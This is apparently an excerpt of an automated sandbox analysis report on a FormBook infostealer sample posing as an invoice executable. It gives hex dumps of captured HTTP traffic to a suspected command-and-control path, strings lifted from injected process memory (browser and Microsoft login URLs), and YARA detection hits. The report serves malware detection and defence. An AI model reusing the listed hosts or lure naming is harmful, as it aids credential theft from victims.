43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Mon, 07 Oct 2024 10:36:24 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 41 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f 18 87 a9 7b 1f b8 a1 1f 54 60 f8 2b 81 91 c3 31 4a 60 93 f7 b3 2c d3 8e fc a2 97 01 98 28 ce 8a 87 c1 3f 7b 97 f6 7e da eb 18 36 c5 31 1c 79 3f 96 9b 8e 13 a6 fe c3 e0 a6 3f 31 0b 3f 4c df 75 ff e7 77 f6 4b d7 ae c2 2c fd 02 44 cf 2a b7 b8 d1 87 13 96 79 6c 02 5d 58 71 66 47 ff 07 db 7d ed f1 67 02 8d dc ee f4 cc e4 7d ec 7a 40 4b 66 5d 65 ef 37 7b 19 2e 9e b5 f8 e3 f8 9b ec 03 14 b9 b6 c0 9b a4 5f 01 22 f3 2c 2d dd fb 30 f5 b2 1b 41 5f f5 ca 5c da db de 57 cb cb ca ac ea 12 58 c7 71 6f 16 5f 50 f3 6c fe 21 82 fc cb 1f ad 2e 5c b3 cc d2 cf d7 63 c3 eb f5 3d 24 3f 33 c1 15 67 17 9d da d5 45 ae 2f df 2d 0b e4 ed f7 ba ef 03 c5 cd 86 af d2 22 97 f6 21 bf 3d 96 7a 60 00 c7 fb 40 5d 57 68 2d dc dc 35 81 cd 40 18 79 fe f9 46 ae 67 ff 6a e6 eb ae d8 04 a7 08 ea fd b4 d7 b1 e9 a5 bd 8d 5d 49 79 cb 91 f9 89 50 bf 4e e2 3e ac dc a4 bc 21 f3 1d 49 18 c0 d1 0f ae 14 a6 6f ae 3c c1 3f 01 da b5 3d 6e a8 bf e0 d8 ca aa 2a 4b 1e 06 fd 1e 6f c2 f6 fa ba c2 12 3a ba 1e bc d2 c4 3b fa b7 6a e8 cd 7d ef b8 76 56 98 bd fd 1e 06 20 a4 b8 45 1f 84 de 6f f4 aa 71 10 8f 68 e6 ca 1a 9f ee f3 10 64 8d 5b 5c e1 eb 3d 1b 0f 5e 66 d7 e5 e7 c3 26 88 33 cd ad e7 bc 32 81 51 23 62 32 7a 63 f0 8a 89 cf 51 fc 1a d7 3e 32 d4 2f a8 b1 8e 6f 6c f3 dd d3 c2 f4 12 b3 3f 88 79 71 58 56 f7 97 b4 d2 03 3e 75 07 59 5d 95 21 08 08 fd c7 1b fb bd 21 5f b9 bb 09 c6 df e1 75 d5 ff 26 2d e0 29 0e 6f d8 f2 e2 ac f7 af 3e 32 be df e1 62 69 33 0e 7d 60 64 1b 9c 10 dc e2 6d fc 8d e4 d7 1b bf 79 01 fd 47 3b 5d 12 2e c8 51 9f c5 b0 3e 10 dc 87 89 e9 df 9a f1 bb 50 9f c6 de cb d2 fe 94 03 12 d4 ad 7c 7d ce 6d 5f f2 a3 95 c5 ce 9b 14 bd 1e af a5 fc 51 07 6d 56 38 f7 16 c0 48 04 72 54 ff e7 de 8c e3 f7 04 7e 49 2a 90 d4 01 b8 07 40 57 20 4b d
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Mon, 07 Oct 2024 10:36:26 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 42 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 22 44 4d 55 cf 68 03 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f 71 4b 76 6d 28 fc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 9b a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee a9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 f0 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d 26 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 5d 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f 18 87 a9 7b 1f b8 a1 1f 54 60 f8 2b 81 51 c3 11 4a 60 e3 f7 b3 2c d3 8e fc a2 97 01 98 28 ce 8a 87 c1 3f 7b 97 f6 7e da eb 18 36 c1 31 1c 79 3f 96 9b 8e 13 a6 fe c3 e0 a6 3f 31 0b 3f 4c df 75 ff e7 77 f6 4b d7 ae c2 2c fd 02 44 cf 2a b7 b8 d1 87 13 96 79 6c 02 5d 58 71 66 47 ff 07 db 7d ed f1 67 02 8d dc ee f4 cc e4 7d ec 7a 40 4b 66 5d 65 ef 37 7b 19 2e 9e b5 f8 e3 f8 9b ec 03 14 b9 b6 c0 9b a4 5f 01 22 f3 2c 2d dd fb 30 f5 b2 1b 41 5f f5 ca 5e da db de 57 cb cb ca ac ea 12 58 c7 71 6f 16 5f 50 f3 6c fe 21 82 fc cb 1f ad 2e 5c b3 cc d2 cf d7 63 c3 eb f5 3d 24 3f 33 c1 15 67 17 9d da d5 45 ae 2f df 2d 0b e4 ed f7 ba ef 03 c5 cd 86 af d2 22 97 f6 21 bf 3d 96 7a 60 00 c7 fb 40 5d 57 68 2d dc dc 35 81 cd 40 18 79 fe f9 46 ae 67 ff 6a e6 eb ae d8 18 a7 09 fa fd b4 d7 b1 c9 a5 bd 8d 5d 49 79 cb 91 f9 89 50 bf 4e e2 3e ac dc a4 bc 21 f3 1d 49 18 c0 d1 0f ae 14 a6 6f ae 3c c6 3f 01 da b5 3d 6e a8 bf e0 d8 ca aa 2a 4b 1e 06 fd 1e 6f c2 f6 fa ba c2 12 4a 5e 0f 5e 69 e2 1d fd 5b 35 f4 e6 be 77 5c 3b 2b cc de 7e 0f 03 10 52 dc a2 0f 42 ef 37 7a d5 38 88 47 0c 7b 65 8d 4f f7 79 08 b2 c6 2d ae f0 f5 9e 8d 07 2f b3 eb f2 f3 61 13 c4 99 e6 d6 73 5e 99 c0 68 92 18 93 6f 0c 5e 31 f1 39 8a 5f e3 da 47 86 fa 05 35 d6 f1 8d 6d be 7b 5a 98 5e 62 f6 07 31 2f 0e cb ea fe 92 56 7a c0 a7 ee 20 ab ab 32 04 01 a1 ff 78 63 bf 37 e4 2b 77 37 c1 f8 3b bc ae fa df a4 05 3c c5 e1 0d 5b 5e 9c f5 fe d5 47 c6 f7 3b 5c 2c 6d c6 a1 0f 8c 6c 83 13 82 5b bc 8d bf 91 fc 7a e3 37 2f a0 ff 68 a7 4b c2 05 39 ea b3 18 d6 07 82 fb 30 31 fd 5b 33 7e 17 ea d3 d8 7b 59 da 9f 72 40 82 ba 95 af cf b9 ed 4b 7e b4 b2 d8 79 93 a2 d7 e3 b5 94 3f ea a0 cd 0a e7 de 02 18 89 40 8e ea ff dc 9b 71 fc 9e c0 2f 49 05 92 3a 00 f7 00 e8 0a 64 89 d
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Mon, 07 Oct 2024 10:36:29 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 42 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 52 4d 55 cf 68 03 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f 71 4b 76 6d 28 fc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 9b a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 f0 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d 26 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 5d 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f 18 87 a9 7b 1f b8 a1 1f 54 60 f8 2b 81 91 c3 31 4a 60 d4 fb 59 96 69 47 7e d1 cb 00 4c 14 67 c5 c3 e0 9f bd 4b 7b 3f ed 75 0c 9b e0 18 8e bc 1f cb 4d c7 09 53 ff 61 70 d3 9f 98 85 1f a6 ef ba ff f3 3b fb a5 6b 57 61 96 7e 01 a2 67 95 5b dc e8 c3 09 cb 3c 36 81 2e ac 38 b3 a3 ff 83 ed be f6 f8 33 81 46 6e 77 7a 66 f2 3e 76 3d a0 25 b3 ae b2 f7 9b bd 0c 17 cf 5a fc 71 fc 4d f6 01 8a 5c 5b e0 4d d2 af 00 91 79 96 96 ee 7d 98 7a d9 8d a0 af 7a 65 2f ed 6d ef ab e5 65 65 56 75 09 ac e3 b8 37 8b 2f a8 79 36 ff 10 41 fe e5 8f 56 17 ae 59 66 e9 e7 eb b1 e1 f5 fa 1e 92 9f 99 e0 8a b3 8b 4e ed ea 22 d7 97 ef 96 05 f2 f6 7b dd f7 81 e2 66 c3 57 69 91 4b fb 90 df 1e 4b 3d 30 80 e3 7d a0 ae 2b b4 16 6e ee 9a c0 66 20 8c 3c ff 7c 23 d7 b3 7f 35 f3 75 57 8c c2 69 82 7e 3f ed 75 6c 72 69 6f 63 57 52 de 72 64 7e 22 d4 af 93 b8 0f 2b 37 29 6f c8 7c 47 12 06 70 f4 83 2b 85 e9 9b 2b 53 f8 27 40 bb b6 c7 0d f5 17 1c 5b 59 55 65 c9 c3 a0 df e3 4d d8 5e 5f 57 58 42 47 d7 83 57 9a 78 47 ff 56 0d bd b9 ef 1d d7 ce 0a b3 b7 df c3 00 84 14 b7 e8 83 d0 fb 8d 5e 35 0e e2 11 c3 5e 59 e3 d3 7d 1e 82 ac 71 8b 2b 7c bd 67 e3 c1 cb ec ba fc 7c d8 04 71 a6 b9 f5 9c 57 26 30 7a 44 50 a3 37 06 af 98 f8 1c c5 af 71 ed 23 43 fd 82 1a eb f8 c6 36 df 3d 2d 4c 2f 31 fb 83 98 17 87 65 75 7f 49 2b 3d e0 53 77 90 d5 55 19 82 80 d0 7f bc b1 df 1b f2 95 bb 9b 60 fc 1d 5e 57 fd 6f d2 02 9e e2 f0 86 2d 2f ce 7a ff ea 23 e3 fb 1d 2e 96 36 e3 d0 07 46 b6 c1 09 c1 2d de c6 df 48 7e bd f1 9b 17 d0 7f b4 d3 25 e1 82 1c f5 59 0c eb 03 c1 7d 98 98 fe ad 19 bf 0b f5 69 ec bd 2c ed 4f 39 20 41 dd ca d7 e7 dc f6 25 3f 5a 59 ec bc 49 d1 eb f1 5a ca 1f 75 d0 66 85 73 6f 01 8c 44 20 47 f5 7f ee cd 38 7e 4f e0 97 a4 02 49 1d 80 7b 00 74 05 b2 c4 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkeddate: Mon, 07 Oct 2024 10:36:31 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 32 37 38 44 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 10:36:37 GMTServer: Apache/2.4.6 (CentOS) PHP/7.2.34Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 78 30 74 6c 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /x0tl/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 10:36:40 GMTServer: Apache/2.4.6 (CentOS) PHP/7.2.34Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 78 30 74 6c 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /x0tl/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 10:36:42 GMTServer: Apache/2.4.6 (CentOS) PHP/7.2.34Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 78 30 74 6c 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /x0tl/ was not found on this server.</p></body></html>
            Source: IEFVDUdSaLLhw.exe, 0000000D.00000002.4584961050.00000000054B6000.00000004.80000000.00040000.00000000.sdmp, svchost.exe, 0000000F.00000002.4578736616.00000000040A6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://cdn.jsinit.directfwd.com/sk-jspark_init.php
            Source: IEFVDUdSaLLhw.exe, 0000000D.00000002.4584961050.000000000678E000.00000004.80000000.00040000.00000000.sdmp, IEFVDUdSaLLhw.exe, 0000000D.00000002.4584961050.000000000596C000.00000004.80000000.00040000.00000000.sdmp, svchost.exe, 0000000F.00000002.4578736616.000000000537E000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 0000000F.00000002.4578736616.000000000455C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
            Source: z1SupplyInvoiceCM60916_Doc.exe, 00000000.00000002.2200567149.00000000034D4000.00000004.00000800.00020000.00000000.sdmp, dpqsbGoWdXlp.exe, 0000000C.00000002.2342313446.0000000002A24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: z1SupplyInvoiceCM60916_Doc.exe, dpqsbGoWdXlp.exe.0.drString found in binary or memory: http://tempuri.org/kursovaSQLDataSet.xsd
            Source: IEFVDUdSaLLhw.exe, 0000000D.00000002.4587208123.0000000007422000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.meliorahomes.net
            Source: IEFVDUdSaLLhw.exe, 0000000D.00000002.4587208123.0000000007422000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.meliorahomes.net/x0tl/
            Source: svchost.exe, 0000000F.00000003.2478216716.0000000008136000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: svchost.exe, 0000000F.00000003.2478216716.0000000008136000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: svchost.exe, 0000000F.00000003.2478216716.0000000008136000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: svchost.exe, 0000000F.00000003.2478216716.0000000008136000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: svchost.exe, 0000000F.00000003.2478216716.0000000008136000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: svchost.exe, 0000000F.00000003.2478216716.0000000008136000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: svchost.exe, 0000000F.00000003.2478216716.0000000008136000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: svchost.exe, 0000000F.00000002.4575924978.0000000002E28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: svchost.exe, 0000000F.00000003.2474247206.0000000007E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: svchost.exe, 0000000F.00000002.4575924978.0000000002E28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
            Source: svchost.exe, 0000000F.00000002.4575924978.0000000002E28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: svchost.exe, 0000000F.00000002.4576101879.0000000002E3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: svchost.exe, 0000000F.00000002.4575924978.0000000002E28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: svchost.exe, 0000000F.00000002.4576101879.0000000002E4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: svchost.exe, 0000000F.00000003.2478216716.0000000008136000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: svchost.exe, 0000000F.00000003.2478216716.0000000008136000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 11.2.z1SupplyInvoiceCM60916_Doc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.z1SupplyInvoiceCM60916_Doc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000B.00000002.2299844236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.4574137574.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.4577917548.0000000003080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.2351474935.0000000005710000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.4578048891.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.2302119508.00000000024B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.4578178574.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 11.2.z1SupplyInvoiceCM60916_Doc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
